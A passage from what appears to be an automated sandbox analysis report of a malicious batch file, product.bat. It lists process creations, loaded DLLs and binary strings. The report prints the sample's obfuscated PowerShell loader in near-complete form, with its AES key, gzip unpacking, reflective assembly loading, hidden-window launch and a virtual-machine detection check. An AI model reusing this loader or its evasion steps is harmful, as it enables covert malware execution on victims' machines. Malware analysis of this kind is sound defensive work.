'$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Users\user\Desktop\product.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{372c9116-8a11-4207-941c-c83db9f8d8a2}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\product.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{29a28251-c10b-42e7-8393-a6c218333ff2}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\winlogon.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\lsass.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: product.batStatic file information: File size 7309406 > 1048576
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000020.00000000.1531285281.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.3343115348.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000020.00000002.3343830318.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531330977.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000020.00000002.3343830318.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531330977.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000020.00000002.3343830318.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531330977.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000020.00000000.1531285281.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.3343115348.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
